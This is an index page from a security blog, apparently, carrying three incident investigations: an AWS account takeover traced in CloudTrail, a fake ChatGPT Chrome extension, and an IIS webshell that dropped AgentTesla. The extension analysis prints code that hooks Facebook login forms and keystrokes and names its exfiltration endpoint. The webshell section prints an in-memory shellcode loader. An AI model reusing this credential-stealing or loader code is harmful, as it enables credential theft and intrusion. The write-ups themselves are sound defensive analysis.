2026","externalUrl":null,"permalink":"/tags/soc/","section":"Tags","summary":"","title":"SOC","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/splunk/","section":"Tags","summary":"","title":"Splunk","type":"tags"},{"content":" TL;DR # Starting at 09:53:27, an attacker operating from 185.192.70.84 executed a targeted brute-force attack against AWS accounts, successfully compromising helpdesk.luke within 33 seconds. The attacker immediately began environment reconnaissance from rotating IPs within the 185.192.70.0/24 subnet. Using the compromised access, they exfiltrated multiple high-value objects from S3 buckets, including CustomerData_Backup_2023-11-01.zip and secrets_vault_dump.bak. To facilitate broader access, they disabled PublicAccessBlock configurations on the backup-and-restore bucket. Finally, rotating to IP 185.192.70.78, the attacker established persistence by creating a new IAM user, marketing.mark, and escalated privileges by adding this backdoor account to the Admins group.\nInitial Access # Brute Force # I received an incident report regarding potential unauthorized access and data exfiltration within our AWS environment. I started the investigation with a broad CloudTrail query to look for brute-force activity.\nindex = * sourcetype=\u0026#34;aws:cloudtrail\u0026#34; eventName = \u0026#34;ConsoleLogin\u0026#34; | table _time, userIdentity.userName, responseElements.ConsoleLogin,sourceIPAddress The logs revealed a rapid sequence of 8 failed login attempts originating from 185.192.70.84 within just 33 seconds. At 2023-11-02 09:54:04, the brute-force attack succeeded, and the attacker gained access to the helpdesk.luke account. 
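The same hunt as the SPL query above, written out as an added example (my code, not part of the original investigation) so it can be run offline over an exported CloudTrail JSON file: walk ConsoleLogin events in time order, keep a per-IP window of recent failures, and raise when a Success arrives while that window is still full. The events are constructed to mirror the timing described above (eight failures in 33 seconds, success 37 seconds after the first attempt); the 60-second window and 5-failure threshold are assumptions, not values from the write-up.

```python
"""Offline re-implementation of the ConsoleLogin brute-force hunt.

Added example, not code from the original write-up. SAMPLE_EVENTS are
constructed records (not real CloudTrail data); WINDOW and THRESHOLD are
assumptions a real deployment would tune.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumption: failures older than this are forgotten
THRESHOLD = 5                    # assumption: failures needed before a success is suspicious


def _event(ts, ip, user, outcome):
    """Build a minimal CloudTrail ConsoleLogin record (constructed sample data)."""
    return {
        "eventTime": ts,
        "eventName": "ConsoleLogin",
        "sourceIPAddress": ip,
        "userIdentity": {"type": "IAMUser", "userName": user},
        "responseElements": {"ConsoleLogin": outcome},
    }


# Eight failures in 33 seconds from one IP, then a success 37 seconds after the
# first attempt, plus an ordinary user who mistyped a password once.
SAMPLE_EVENTS = [
    _event("2023-11-02T09:53:27Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:31Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:36Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:41Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:46Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:50Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:53:55Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:54:00Z", "185.192.70.84", "helpdesk.luke", "Failure"),
    _event("2023-11-02T09:54:04Z", "185.192.70.84", "helpdesk.luke", "Success"),
    _event("2023-11-02T09:53:50Z", "10.20.30.40", "alice", "Failure"),
    _event("2023-11-02T09:54:10Z", "10.20.30.40", "alice", "Success"),
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_console_bruteforce(events, window=WINDOW, threshold=THRESHOLD):
    """Return one finding per source IP that logged in successfully after at
    least `threshold` ConsoleLogin failures inside `window`.

    Streams events in time order and keeps a per-IP deque of recent failure
    timestamps; a Success while the deque is still full is the brute-force
    success pattern seen in the investigation.
    """
    findings = []
    recent_failures = defaultdict(deque)          # sourceIPAddress -> failure timestamps
    for ev in sorted(events, key=_ts):
        if ev.get("eventName") != "ConsoleLogin":
            continue
        now = _ts(ev)
        ip = ev.get("sourceIPAddress", "?")
        queue = recent_failures[ip]
        while queue and now - queue[0] > window:  # expire failures outside the window
            queue.popleft()
        outcome = ev.get("responseElements", {}).get("ConsoleLogin")
        if outcome == "Failure":
            queue.append(now)
        elif outcome == "Success" and len(queue) >= threshold:
            findings.append({
                "sourceIPAddress": ip,
                "userName": ev.get("userIdentity", {}).get("userName", "?"),
                "failures_before_success": len(queue),
                "first_failure": queue[0].strftime("%Y-%m-%dT%H:%M:%SZ"),
                "success": ev["eventTime"],
                "seconds_to_compromise": int((now - queue[0]).total_seconds()),
            })
            queue.clear()                          # do not re-alert on the same burst
    return findings


if __name__ == "__main__":
    for finding in detect_console_bruteforce(SAMPLE_EVENTS):
        print(finding)
```

Alice's single failure followed by a success is below the threshold and produces nothing; the helpdesk.luke burst produces one finding carrying the first failure time, the success time and the seconds between them, which is the number worth putting in the TL;DR.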
I checked the originating IP and confirmed it belongs to a known UK-based VPN provider, indicating the attacker is attempting to mask their true location.\nDiscovery and Reconnaissance # Immediately following the successful login, the attacker began executing discovery commands (e.g., DescribeRegions, ListIndexes, ListBuckets, GetBucketPolicyStatus) to map out the AWS environment and identify target resources.\nDuring this recon phase, the attacker began rotating their source IPs across the 185.192.70.0/24 subnet, leveraging their VPN provider\u0026rsquo;s infrastructure to distribute the activity.\nExfiltration # S3 bucket # I focused my search on CloudTrail S3 data events for the compromised helpdesk.luke account to identify what data the attacker accessed. Object-level calls such as GetObject and PutObject are only recorded when S3 data event logging is enabled for the bucket or trail; without it this query returns nothing even if data was taken.\nindex=* sourcetype=\u0026#34;aws:cloudtrail\u0026#34; *helpdesk* AND (eventName IN (GetObject, PutObject)) | sort _time The logs confirmed significant data exfiltration. The attacker issued multiple GetObject requests, successfully downloading several highly sensitive and critical files from various S3 buckets:\nsecrets_vault_dump.bak (from backup-and-restore98825501)\nCustomerData_Backup_2023-11-01.zip (from customer-data-backup57893984)\nContract_Agreement.pdf (from legal-docs45020393)\nprototype.obj (from research-project-files23411723)\nPublicAccessBlock # At 09:58, the attacker modified the security posture of the backup-and-restore98825501 bucket with a PutBucketPublicAccessBlock call.\nrequestParameters.PublicAccessBlockConfiguration.BlockPublicAcls: false\nrequestParameters.PublicAccessBlockConfiguration.BlockPublicPolicy: false\nrequestParameters.PublicAccessBlockConfiguration.IgnorePublicAcls: false\nrequestParameters.PublicAccessBlockConfiguration.RestrictPublicBuckets: false By setting all four parameters to false, the attacker disabled the S3 Block Public Access guardrail for the bucket. On its own this does not expose any object; it removes the control that overrides public ACLs and bucket policies, so any public ACL or policy applied afterwards (or already present) would grant unauthenticated internet access to the contents. Reviewing PutBucketAcl, PutObjectAcl and PutBucketPolicy events for this bucket after 09:58 is the next check.\nPersistence and Privilege Escalation # New User # To maintain access even if 
the helpdesk.luke account password was reset, the attacker established a backdoor. Rotating to a new IP address, 185.192.70.78, they created a new IAM user named marketing.mark.\nAdmins group # Following the account creation, the attacker added marketing.mark to the Admins IAM group, granting their backdoor account full administrative privileges over the AWS environment.\nIOCs # Type | Value | Description\n--- | --- | ---\nIP | 185.192.70.84 | Initial brute-force source (VPN Consumer London)\nIP Subnet | 185.192.70.0/24 | Rotating VPN infrastructure used for reconnaissance\nIP | 185.192.70.78 | Source IP used for creating the backdoor account\nAccount | helpdesk.luke | Initial compromised account\nAccount | marketing.mark | Backdoor IAM account created by the attacker\nGroup | Admins | IAM group abused for privilege escalation\nBucket | backup-and-restore98825501 | S3 bucket whose Block Public Access settings were disabled\nFile | secrets_vault_dump.bak | Exfiltrated high-value data\nFile | CustomerData_Backup_2023-11-01.zip | Exfiltrated high-value data\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef recon fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef evasion fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; A([VPN IP - 185.192.70.84]):::default --\u003e B[09:53:27 - Brute-force attack begins]:::access B --\u003e C[09:54:04 - Successful login to helpdesk.luke]:::access subgraph Discovery [Discovery] C --\u003e D[09:54-09:55 - ReconnaissanceDescribeRegions, ListBuckets, etc.IPs rotating via 185.192.70.0/24]:::recon end subgraph Collection [Data 
Exfiltration] D --\u003e E[09:55-09:57 - GetObject executionExfiltration of CustomerData_Backup.zip,secrets_vault_dump.bak, and others]:::exfil end subgraph Defense [Defense Evasion] E --\u003e F[09:58:01 - PutBucketPublicAccessBlockbackup-and-restore bucket made public]:::evasion end subgraph Persistence [Persistence \u0026 PrivEsc] F --\u003e G[09:59:33 - Creation of backdoor IAM usermarketing.mark from IP 185.192.70.78]:::persist G --\u003e H[09:59 - marketing.mark added to Admins group]:::persist end ","date":"April 15, 2026","externalUrl":null,"permalink":"/blue_team/splunk-awsraid/","section":"","summary":"An attacker conducted a brute-force attack to compromise the helpdesk.luke account, performed reconnaissance from various VPN IPs, exfiltrated sensitive data including customer backups and secrets, modified bucket permissions, and established persistence by creating an admin backdoor account.","title":"Splunk-AWSRaid","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/abuseipdb/","section":"Tags","summary":"","title":"AbuseIPDB","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/active-directory/","section":"Tags","summary":"","title":"Active Directory","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/agenttesla/","section":"Tags","summary":"","title":"AgentTesla","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/anti-vm/","section":"Tags","summary":"","title":"Anti-VM","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/as-rep-roasting/","section":"Tags","summary":"","title":"AS-REP Roasting","type":"tags"},{"content":" TL;DR # I analyzed a malicious Chrome extension posing as a ChatGPT assistant. The background loader uses basic anti analysis checks to avoid sandboxes before injecting the main payload core/app.js into all web pages. 
The core script specifically targets www.facebook.com, hooking form submissions to steal credentials and capturing keystrokes. All stolen data is AES encrypted with a hardcoded key and exfiltrated to https://Mo.Elshaheedy.com via image GET requests.\nExtension structure # Before digging into the specific malware, it helps to understand the standard components of a Chrome extension.\nManifest.json: The core configuration file, specifying metadata, permissions, and behavior. Key fields to inspect include permissions (e.g., access to cookies, tabs, or external URLs), host permissions defining interaction with specific domains, and content scripts or web accessible resources indicating injected functionality. Background Scripts: Persistent scripts managing event handling and browser monitoring. Often exploited for tracking user activity or sending data to remote servers. Content Scripts: Injected into web pages to interact with the DOM. A common vector for data theft or page manipulation. Popup Scripts: Handle the extension\u0026rsquo;s user interface, which may conceal malicious actions or mislead users. Web-Accessible Resources: Files accessible by web pages, potentially used to deliver malicious payloads or expose sensitive data. External Resources: URLs or scripts loaded externally, often linked to malicious domains or obfuscated content. Initial Triage # I started by looking at the manifest.json file to see how this specific extension is configured. It calls itself \u0026ldquo;ChatGPT\u0026rdquo; and claims to be an AI powered assistant, but the configuration is highly suspicious.\nBreaking down the manifest reveals its true capabilities:\nPermissions: Broad access to all web pages (http://*/* and https://*/*), browser tabs, and cookies. Privileges for webRequest and webRequestBlocking enable interception and modification of network traffic, which could redirect users or inject malicious scripts. 
The storage permission allows saving potentially stolen data locally. Background Script: The persistent script (system/loader.js) runs continuously, allowing real time monitoring, data exfiltration, and possible communication with a Command and Control (C2) server. Content Scripts: The injected script (core/app.js) runs on all pages (\u0026lt;all_urls\u0026gt;), interacting with the DOM to read sensitive user input, manipulate content, and potentially log keystrokes or inject phishing forms. Browser Action: A popup UI (assets/ui.html) provides a seemingly legitimate interface, potentially hiding malicious functionality or links. Anti Analysis and Loader # I checked out system/loader.js next to see how it bootstraps the execution.\nThere\u0026rsquo;s a quick anti sandbox check right at the start. It checks if navigator.plugins.length is 0 or if the user agent contains HeadlessChrome. Automated analysis environments and headless browsers typically don\u0026rsquo;t have plugins installed, so if this triggers, the script throws an alert and disables itself by returning false on messages. 
If the check passes, it dynamically creates a script tag to load the main payload, core/app.js.\nTargeting and Keylogging # I grabbed the main logic from app.js to see what it actually does once injected into a page.\nconst targets = [_0xabc1(\u0026#39;d3d3LmZhY2Vib29rLmNvbQ==\u0026#39;)];\nif (targets.indexOf(window.location.hostname) !== -1) {\n    document.addEventListener(\u0026#39;submit\u0026#39;, function(event) {\n        let form = event.target;\n        let formData = new FormData(form);\n        let username = formData.get(\u0026#39;username\u0026#39;) || formData.get(\u0026#39;email\u0026#39;);\n        let password = formData.get(\u0026#39;password\u0026#39;);\n\n        if (username \u0026amp;\u0026amp; password) {\n            exfiltrateCredentials(username, password);\n        }\n    });\n\n    document.addEventListener(\u0026#39;keydown\u0026#39;, function(event) {\n        var key = event.key;\n        exfiltrateData(\u0026#39;keystroke\u0026#39;, key);\n    });\n} The script defines a target array holding a base64 encoded string, d3d3LmZhY2Vib29rLmNvbQ==, which the _0xabc1 helper decodes at runtime. Decoding it reveals www.facebook.com. If the current hostname matches, the script attaches a submit listener to the document, which fires for any form on the page, and looks for a username or email field together with a password field. If it finds them, it passes them to an exfiltration function. It also attaches a global keydown listener, so every key pressed on the site is captured, not just the login form.\nEncryption and Exfiltration # I looked at the rest of app.js to understand how exfiltrateCredentials and exfiltrateData process the stolen information.\nThe script packs the stolen data along with the hostname into a JSON payload. It passes this to encryptPayload, which uses CryptoJS to AES encrypt the data. The key is hardcoded as SuperSecretKey123, and the Initialization Vector is randomly generated. It concatenates the IV and ciphertext, base64 encodes it, and hands it off to sendToServer. Because the key is in the extension source and the IV travels with the ciphertext, the encryption only hides the data from casual inspection: anyone holding the extension and a capture of the exfil traffic can decrypt it, which is worth doing during the investigation to establish exactly what left the host.\nTo actually get the data out, sendToServer uses pixel tracking. 
It creates a new Image object and sets the source to https://Mo.Elshaheedy.com/collect?data= appended with the URL encoded encrypted payload. Assigning src is enough to make the browser issue a GET request to the attacker\u0026rsquo;s C2; the script additionally appends the element to the document body. Image loads are exempt from CORS because the page never reads the response, so the C2 needs no cross-origin headers, and the traffic does not show up under the XHR or Fetch entries an analyst tends to watch in the network tab. It is not invisible, though: the request is logged like any other GET, so a proxy or DNS log search for Mo.Elshaheedy.com, or for image requests carrying an unusually long data= query string, is the quickest way to scope which hosts were affected.\nIOCs # Value | Description\n--- | ---\nhttps://Mo.Elshaheedy.com/collect | Exfiltration C2 endpoint\nSuperSecretKey123 | Hardcoded AES encryption key\nd3d3LmZhY2Vib29rLmNvbQ== | Base64 encoded target (www.facebook.com)\nsystem/loader.js | Extension background loader script\ncore/app.js | Extension main payload script\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([Victim Browser]):::default --\u003e B[loader.js executesChecks for virtual environment]:::exec B --\u003e C[app.js injectedTargets www.facebook.com]:::mal C --\u003e D[Hooks forms and keystrokesCaptures credentials]:::access D --\u003e E[AES EncryptionHardcoded key]:::exec E --\u003e F[GET Request via ImageMo.Elshaheedy.com]:::exfil ","date":"April 14, 2026","externalUrl":null,"permalink":"/investigations/cdef-fakegpt/","section":"","summary":"A malicious Chrome extension masquerading as ChatGPT uses anti analysis checks, hooks Facebook login forms, and acts as a keylogger, exfiltrating AES encrypted data via pixel tracking.","title":"CDEF-FakeGPT","type":"investigations"},{"content":" TL;DR # An 
attacker at 10.0.2.4 began with an Nmap SYN scan against IIS server 10.0.2.15, identifying open ports 80, 135, 139, 443, and 445. Using SMB access to an unauthenticated Documents share, the attacker read information.txt and uploaded shell.aspx - an ASPX webshell using VirtualAlloc and CreateThread to execute shellcode in memory. A GET request to /Documents/shell.aspx returned HTTP 200, triggering a reverse shell from w3wp.exe back to the attacker on port 4443. The IIS worker process then spawned updatenow.exe, which was placed in the Startup folder for persistence. The file was confirmed as AgentTesla (56/70 VT detections) and established SMTP communication to cp8nl.hyperhost.ua:587 for data exfiltration.\nReconnaissance # Port Scanning # I opened the PCAP in Wireshark and applied the filter tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 0 to isolate initial SYN packets (SYN set, ACK clear). A burst of these from one host to many ports on one target is the signature of an Nmap SYN (half-open) scan: the scanner sends a SYN to each port and, when a SYN-ACK comes back, answers with a RST instead of the ACK that would complete the handshake.\nThe results showed 10.0.2.4 sending SYN packets to a wide range of ports on 10.0.2.15. To identify which ports responded, I switched the filter to tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 1 to capture SYN-ACK responses from the target (adding ip.src == 10.0.2.15 keeps only the target\u0026rsquo;s replies and drops SYN-ACKs from unrelated sessions).\nThe target replied with SYN-ACK on ports:\n80 (HTTP)\n135 (RPC)\n139 and 445 (SMB)\nSMB Enumeration # With ports identified, the attacker moved to SMB reconnaissance. Filtering for SMB2 traffic revealed a connection to the share \\\\10.0.2.15\\IPC$ followed by a NetShareEnumAll request via the SRVSVC named pipe. As a result, the attacker enumerated all network shares on the remote host without authentication.\nThe attacker connected to \\\\10.0.2.15\\Documents and sent a Find Request with a wildcard pattern * to list all files.\nWebshell Upload # Share Content Analysis # The directory listing returned 4 objects. 
The attacker issued an SMB2 Read Request for information.txt, which contained a note from the development team revealing that the server was configured to link the web server with SMB - confirming that the Documents share was directly served by IIS, so anything written to the share becomes reachable over HTTP and, for an .aspx file, is compiled and executed by the worker process.\nThis server setup is under development. We are trying to link the web server with SMB.\nPlease do not tamper with our work.\nBest regards\nDev Team\nASPX Webshell Deployment # The attacker uploaded shell.aspx via an SMB2 Write Request of 1,015,024 bytes. The webshell uses Windows API calls imported via P/Invoke - VirtualAlloc allocates executable memory and CreateThread executes a shellcode byte array embedded directly in the Page_Load method:\nprotected void Page_Load(object sender, EventArgs e)\n{\n    // embedded payload as a C# byte array; the leading 0x4d 0x5a is the MZ magic\n    byte[] aQG_MD7kxARm = new byte[200774] {0x4d,0x5a,0x41,0x52, ... ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,\n    0xff,0xff};\n\n    // allocate RWX memory, copy the bytes in, and run them on a new thread\n    IntPtr oljksbhqM3m = VirtualAlloc(IntPtr.Zero,(UIntPtr)aQG_MD7kxARm.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n    System.Runtime.InteropServices.Marshal.Copy(aQG_MD7kxARm,0,oljksbhqM3m,aQG_MD7kxARm.Length);\n    IntPtr kdw1 = IntPtr.Zero;\n    IntPtr beozdB = CreateThread(IntPtr.Zero,UIntPtr.Zero,oljksbhqM3m,IntPtr.Zero,0,ref kdw1);\n}\n\u0026lt;/script\u0026gt; The byte array opens with 0x4d 0x5a 0x41 0x52: \u0026#39;MZ\u0026#39; is the PE magic, and on x64 those same bytes decode to pop r10 / push r10, the trick used by reflective PE-to-shellcode loaders so that a full executable image can be started at offset zero. That points to a complete PE (for example a stageless payload) rather than a small stager, and explains why the upload is around 1 MB. Because the payload never touches disk as a separate file, the oversized shell.aspx itself and the RWX private allocation inside w3wp.exe are the artifacts to hunt for.\nWebshell Execution and Reverse Shell # HTTP Trigger # The attacker triggered the webshell with a GET request to /Documents/shell.aspx. The server responded with HTTP 200 OK. On its own a 200 only shows the page compiled and ran without an unhandled exception; the outbound connection that follows is the confirmation that the shellcode executed.\nReverse Shell Establishment # After the HTTP 200 response, a new SYN packet originated from 10.0.2.15:49688 toward 10.0.2.4:4443 - the victim initiating an outbound connection to the attacker on port 4443.\nPost-Exploitation and Persistence # Process Tree Analysis # Next I analyzed the memory dump using Volatility. The process list showed w3wp.exe (PID 4332) with a child process updatenow.exe (PID 900, PPID 4332). 
w3wp.exe is the IIS worker process that handles web requests sent to a web server running Microsoft’s Internet Information Services (IIS). Whenever a user accesses a resource on an IIS server, this is the process responsible for executing those requests, so anything a webshell launches shows up as a child of w3wp.exe - a parent/child pair that is rarely legitimate and worth a standing detection. The network connections output shows that w3wp.exe (PID 4332) held a TCP connection from port 49688 to 10.0.2.4:4443, matching the SYN seen in the capture.\nStartup Folder Persistence # The full path for updatenow.exe was recovered from the memory dump; it places the executable in the Startup folder:\nC:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updatenow.exe This is the all-users Startup folder under ProgramData, so the binary launches at every interactive logon by any user of the host (T1547.001).\nPayload Identification and Exfiltration # Malware Confirmation # I extracted updatenow.exe from the memory dump for analysis. The file is a 32-bit PE packed with UPX.\nupdatenow.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed\nMD5: d797600296ddbed4497725579d814b7e\nSHA256: c25a6673a24d169de1bb399d226c12cdc666e0fa534149fc9fa7896ee61d406f C2 and Exfiltration Channel # VirusTotal\u0026rsquo;s network behavior showed DNS resolution of cp8nl.hyperhost.ua resolving to 185.174.175.187, with a TCP connection established to port 587. 
Checking cp8nl.hyperhost.ua on VirusTotal confirmed 3/94 vendors flagged the domain, with crowdsourced context explicitly linking it to AgentTesla C2 infrastructure.\nA threat intelligence database lookup on the SHA256 hash returned a definitive match to AgentTesla - a commercial infostealer and keylogger known for credential theft, clipboard capture, and SMTP-based exfiltration.\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef recon fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef shell fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([10.0.2.4 - Attacker]):::start --\u003e B[Nmap SYN scan10.0.2.15 - open: 80 135 139 445]:::recon subgraph SMB [SMB Enumeration and Webshell Upload] B --\u003e C[IPC$ connectionNetShareEnumAll via SRVSVC]:::recon C --\u003e D[Documents share accessedinformation.txt read]:::recon D --\u003e E[shell.aspx uploadedSMB2 Write 1015024 bytes]:::exec end subgraph Shell [Webshell Execution] E --\u003e F[GET /Documents/shell.aspxHTTP 200 OK]:::shell F --\u003e G[w3wp.exe PID 4332reverse shell to 10.0.2.4:4443]:::shell end subgraph Persist [Persistence] G --\u003e H[w3wp.exe spawnsupdatenow.exe PID 900]:::persist H --\u003e I[updatenow.exe placed inStartup folder - T1547.001]:::persist end subgraph Exfil [Exfiltration] I --\u003e J[AgentTesla beaconscp8nl.hyperhost.ua:587 SMTP]:::exfil J --\u003e K([Credentials and keylog dataexfiltrated via email185.174.175.187]):::exfil end 
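The two Wireshark filters from the Reconnaissance section, reimplemented as an added example (my code, not the author's) so the same logic can be run over any list of TCP packet records, however they were exported from the capture: bare SYNs (syn==1, ack==0) from one host to many ports identify the scanner, SYN-ACKs (syn==1, ack==1) coming back identify the open ports, and a count of completed handshakes separates a half-open scan from a busy but legitimate client. The packet list is constructed to mimic the capture described above (same hosts and open ports); the port-count threshold is an assumption.

```python
"""Offline version of the SYN-scan triage done in Wireshark above.

Added example, not code from the original write-up. build_sample_capture()
returns constructed packets that imitate the described scan; the
MIN_PORTS_FOR_SCAN threshold is an assumption.
"""
from collections import defaultdict

MIN_PORTS_FOR_SCAN = 10   # assumption: bare SYNs to this many distinct ports = scan


def pkt(src, sport, dst, dport, flags):
    """One TCP packet as a dict; flags is a string of letters S/A/R/F/P."""
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "flags": set(flags)}


def build_sample_capture():
    """Constructed packets: 10.0.2.4 half-open scans 14 ports on 10.0.2.15,
    four of which answer SYN-ACK; a normal client completes one handshake."""
    scanner, target = "10.0.2.4", "10.0.2.15"
    probed = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 3389, 8080]
    open_ports = {80, 135, 139, 445}
    packets = []
    for i, port in enumerate(probed):
        sport = 40000 + i
        packets.append(pkt(scanner, sport, target, port, "S"))
        if port in open_ports:
            packets.append(pkt(target, port, scanner, sport, "SA"))
            packets.append(pkt(scanner, sport, target, port, "R"))   # Nmap tears it down
        else:
            packets.append(pkt(target, port, scanner, sport, "RA"))  # closed port
    # Legitimate client: full three-way handshake to the web server.
    packets.append(pkt("10.0.2.7", 51000, target, 80, "S"))
    packets.append(pkt(target, 80, "10.0.2.7", 51000, "SA"))
    packets.append(pkt("10.0.2.7", 51000, target, 80, "A"))
    return packets


def summarize_syn_scans(packets, min_ports=MIN_PORTS_FOR_SCAN):
    """Return one record per (scanner, target) pair that sent bare SYNs to at
    least min_ports distinct ports: the ports that replied SYN-ACK and how
    many of those the scanner completed with an ACK (zero for Nmap -sS)."""
    probed = defaultdict(set)   # (src, dst) -> dports that received a bare SYN
    synack = defaultdict(set)   # (client, server) -> server ports that replied SYN-ACK
    acked = defaultdict(set)    # (client, server) -> server ports the client ACKed
    for p in packets:
        f = p["flags"]
        if f == {"S"}:                      # tcp.flags.syn == 1 && tcp.flags.ack == 0
            probed[(p["src"], p["dst"])].add(p["dport"])
        elif f == {"S", "A"}:               # tcp.flags.syn == 1 && tcp.flags.ack == 1
            synack[(p["dst"], p["src"])].add(p["sport"])   # reply flows server -> client
        elif f == {"A"}:
            acked[(p["src"], p["dst"])].add(p["dport"])
    findings = []
    for (src, dst), ports in probed.items():
        if len(ports) < min_ports:
            continue
        open_ports = sorted(synack[(src, dst)] & ports)
        findings.append({
            "scanner": src,
            "target": dst,
            "ports_probed": len(ports),
            "open_ports": open_ports,
            "completed_handshakes": len(acked[(src, dst)] & set(open_ports)),
        })
    return findings


if __name__ == "__main__":
    for finding in summarize_syn_scans(build_sample_capture()):
        print(finding)
```

The legitimate client touches a single port and is never reported; the scanner record lists 80, 135, 139 and 445 as open with zero completed handshakes, which is the half-open signature the text describes. Feeding real data only requires mapping each packet's addresses, ports and flag letters into the same dict shape.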
IOCs # Type | Value | Description\n--- | --- | ---\nIP | 10.0.2.4 | attacker IP - scanner, SMB client, reverse shell listener\nIP | 10.0.2.15 | victim IIS server\nIP | 185.174.175.187 | AgentTesla SMTP exfiltration server\nDomain | cp8nl.hyperhost[.]ua | AgentTesla C2, 3/94 VT, SMTP port 587\nFile | shell.aspx | ASPX webshell using VirtualAlloc and CreateThread shellcode execution\nFile | updatenow.exe | AgentTesla, SHA256: c25a6673a24d169de1bb399d226c12cdc666e0fa534149fc9fa7896ee61d406f, MD5: d797600296ddbed4497725579d814b7e, 56/70 VT\nShare | \\\\10.0.2.15\\Documents | unauthenticated SMB share used for webshell upload\nPath | C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updatenow.exe | persistence via Startup folder T1547.001\nPort | 4443/TCP | reverse shell listener on attacker host\nPort | 587/TCP | SMTP exfiltration channel ","date":"April 14, 2026","externalUrl":null,"permalink":"/investigations/cdef-lockdown/","section":"","summary":"An attacker performed SYN port scanning against an IIS server, enumerated open SMB shares, uploaded a webshell to the Documents share, triggered a reverse shell on port 4443, and established persistence via AgentTesla dropped into the Startup folder, which exfiltrated data via SMTP to cp8nl.hyperhost.ua.","title":"CDEF-Lockdown","type":"investigations"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/click-fix/","section":"Tags","summary":"","title":"Click Fix","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/credential-dumping/","section":"Tags","summary":"","title":"Credential Dumping","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/edr/","section":"Tags","summary":"","title":"EDR","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/escalation-to-l2/","section":"Tags","summary":"","title":"Escalation to L2","type":"tags"},{"content":"","date":"April 14, 
